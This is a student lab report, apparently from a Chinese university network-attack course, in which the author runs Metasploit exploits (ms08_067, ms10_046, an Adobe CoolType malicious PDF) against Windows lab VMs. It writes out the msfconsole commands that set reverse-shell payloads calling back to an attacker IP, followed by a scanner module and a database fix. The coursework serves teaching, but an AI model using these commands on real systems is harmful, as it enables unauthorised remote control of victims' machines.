2018-2019-2 20165209 《网络对抗技术》Exp5:MSF基础应用
2024-10-12 05:06:55
2018-2019-2 20165209 《网络对抗技术》Exp5:MSF基础应用
目录
- 一、基础问题回答和实验内容
- 二、攻击实例
- 三、实验中遇到的问题及解决方案
- 四、实验总结
一、基础问题回答和实验内容
1.基础问题回答
用自己的话解释什么是exploit,payload,encode.
exploit:漏洞攻击,一个exploit程序肯定会触发系统的一个或多个漏洞,进而程序直接获取到目标系统的部分或所有权限。
payload:搞破坏的关键代码。
encode:保证payload不出现特定字符,避免被查杀。
实验内容
任务一:一个主动攻击实践,如ms08_067。
任务二: 一个针对浏览器的攻击,如ms11_050。
任务三: 一个针对客户端的攻击,如Adobe。
任务四: 成功应用任何一个辅助模块。
二、攻击实例
1.主动攻击实践,实现ms08_067
靶机:Microsoft Windows 2000(192.168.1.218)
payload :generic/shell_reverse_tcp
实验步骤
==首先要把靶机和攻击者的连接方式都改为桥接!!==
- 输入
msfconsole
打开metasploit控制台 - 输入
use exploit/windows/smb/ms08_067_netapi
使用ms08_067漏洞攻击方式 - 输入
set payload generic/shell_reverse_tcp
以shell反向tcp连接为有效载荷 - 输入
set RHOST 192.168.1.218
ip为靶机的IP - 输入
set LHOST 192.168.1.182
ip为攻击者的IP - 输入
set target 0
设置目标,0为无差别攻击 输入
exploit
开始攻击
攻击浏览器实践,ms10_046漏洞攻击
靶机:Microsoft Windows XP SP3(English)
payload :windows/meterpreter/reverse_tcp
实验步骤
- 输入
use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
使用浏览器漏洞 - 输入
set payload windows/meterpreter/reverse_tcp
选择反向链接载荷 - 输入
set SRVHOST 192.168.1.182
设置服务器IP(攻击者IP) - 输入
set LHOST 192.168.1.182
设置攻击者IP - 输入
exploit
开始攻击
- 在win xp sp3的浏览器中访问刚刚设置的服务器IP
http://192.168.1.182
弹出如下窗口
- 同时攻击者会开始监听并与靶机建立连接。
输入
sessions
查看有多少主机被反向链接到攻击者和靶机对应的序号。输入
sessions -i 2
控制靶机(-i后面的数即为靶机对应的序号)
攻击客户端实践,实现Adobe
靶机:Windows XP sp3(192.168.1.139)
实验步骤
- 输入
use windows/fileformat/adobe_cooltype_sing
使用漏洞 - 输入
set payload windows/meterpreter/reverse_tcp
选择攻击载荷 - 输入
set LHOST 192.168.1.182
为攻击者IP - 输入
set FILENAME 20165209.pdf
设置生成pdf文件的文件名 - 输入
exploit
开始攻击
- 将生成的
20165209.pdf
复制到Windows XP中 - 输入
back
退出当前模块 - 输入
use exploit/multi/handler
进入监听模块 - 输入
set payload windows/meterpreter/reverse_tcp
选择攻击载荷 - 输入
set LHOST 192.168.1.182
为攻击者IP - 输入
exploit
开始攻击 - 在靶机中打开
20165209.pdf
,攻击成功
成功攻击一个辅助模块,实现网段扫描(唯一)
靶机:
实验步骤
- 输入
show auxiliary
查看所有的辅助模块
- 输入
info scanner/steam/server_info
查看模块信息,请求从服务器获取信息,扫描范围默认为10(从起始地址开始往后扫10个),端口固定为UDP端口27015。端口27015只是用作输入/输出的通信端口。
- 输入
use scanner/steam/server_info
使用漏洞
- 输入
set RHOSTS 192.168.1.180
为起始IP
- 输入
exploit
开始攻击
(果不其然,这个网段里木有服务器,sang~)
三、实验中遇到的问题及解决方案
1.armitage无法开启,出现错误提示如下图
- 参考了一篇博客里面解释了很多,具体的操作如下
1 输入 /etc/init.d/postgresql start 启动postgresql数据库;
2 输入 msfdb init 初始化MSF数据库(关键步骤);
3 输入 msfconsole 运行msfconsole;
#4 输入 db_status 在msf中查看数据库连接状态。
- 在显示
Connected to msf. Connection type: postgresql.
之后,再次输入armitage即可开启成功。
四、实验总结
1.实验总结与体会
实验最痛苦的就是明明和大家做的一样,但是我的就是无法攻击成功。通过实验掌握了msf的简单操作,始终牢记不懂就help,不知道是干什么的就info,看不懂就有道的宗旨,还是有些收获的,有些快乐。
2.离实战还缺些什么技术
觉得差的也不多,也就一个大神的距离吧。通过在网络上捕包反查IP,并且攻击。类似这种步骤中的功能,我目前只能在已知的情况下,进行强迫式攻击(就是硬生生让舍友拷一下)。
最新文章
- Log4j简介
- [转]Cookie/Session机制详解
- css定位之浮动定位
- 软工实践个人练习-使用github进行代码管理
- Web版报表的架构和设计思路
- 【UOJ Easy Round #2】
- iOS-单例模式-使用技巧
- 需要考虑的9个SEO实践
- android 拍照 onCreate() 调用两次的问题
- JS 引用
- ZOJ 3802 Easy 2048 Again 像缩进DP
- 简单好用用js就可以保存文本文件到本地
- cocoapods安装说明,最快安装,以及使用
- 【Android 应用开发】Activity生命周期 与 Activity 之间的通信
- Android破解学习之路(八)—— 进化之地内购破解
- Javascript - ExtJs - 整合百度文章编辑器
- mysql数据库基于LVM快照的备份
- Maven子模块
- 【转】python中json.loads与eval的区别
- Angular6 学习笔记——内容投影, ViewChild和ContentChild
热门文章
靶机:
实验步骤
- 输入
show auxiliary
查看所有的辅助模块 - 输入
info scanner/steam/server_info
查看模块信息,请求从服务器获取信息,扫描范围默认为10(从起始地址开始往后扫10个),端口固定为UDP端口27015。端口27015只是用作输入/输出的通信端口。
- 输入
use scanner/steam/server_info
使用漏洞 - 输入
set RHOSTS 192.168.1.180
为起始IP - 输入
exploit
开始攻击
(果不其然,这个网段里木有服务器,sang~)
三、实验中遇到的问题及解决方案
1.armitage无法开启,出现错误提示如下图
- 参考了一篇博客里面解释了很多,具体的操作如下
1 输入 /etc/init.d/postgresql start 启动postgresql数据库;
2 输入 msfdb init 初始化MSF数据库(关键步骤);
3 输入 msfconsole 运行msfconsole;
#4 输入 db_status 在msf中查看数据库连接状态。
- 在显示
Connected to msf. Connection type: postgresql.
之后,再次输入armitage即可开启成功。
四、实验总结
1.实验总结与体会
实验最痛苦的就是明明和大家做的一样,但是我的就是无法攻击成功。通过实验掌握了msf的简单操作,始终牢记不懂就help,不知道是干什么的就info,看不懂就有道的宗旨,还是有些收获的,有些快乐。
2.离实战还缺些什么技术
觉得差的也不多,也就一个大神的距离吧。通过在网络上捕包反查IP,并且攻击。类似这种步骤中的功能,我目前只能在已知的情况下,进行强迫式攻击(就是硬生生让舍友拷一下)。